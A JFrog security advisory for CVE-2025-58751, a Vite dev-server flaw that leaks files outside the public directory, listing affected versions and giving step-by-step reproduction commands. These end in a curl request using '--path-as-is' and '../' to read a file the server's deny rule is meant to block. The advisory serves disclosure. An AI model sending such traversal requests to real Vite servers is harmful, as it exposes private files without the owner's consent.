JFrog Security Research
< Back

- Vite arbitrary restricted remote file leak

CVE-2025-58751 | CVSS 7.5

JFrog Severity:high

Discovered ByOri Hollanderof the JFrog Security Research Team

Published 15 Sep, 2025 | Last updated 15 Sep, 2025

Vite arbitrary restricted remote file leak

vite

>=7.1.0,<=7.1.4

>=7.0.0,<=7.0.6

>=6.0.0,<=6.3.5

<=5.4.19

This vulnerability allows a remote attacker to leak files outside of the public directory, assuming the path of the filename to leak has the same prefix as the public directory path.

For example -

Public directory - /www/p

File to leak - /www/private.txt

Execute the following shell commands: (Note that the publicDir is p)

npm create vite@latest
cd vite-project/
mkdir p
cd p
ln -s a b
cd ..
echo 'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({publicDir: path.resolve(__dirname, "p/"), server: {fs: {deny: [path.resolve(__dirname, "private.txt")]}}})' > vite.config.js
echo "secret" > private.txt
npm install
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/../private.txt'

No mitigations are supplied for this vulnerability

Fix PR

< Back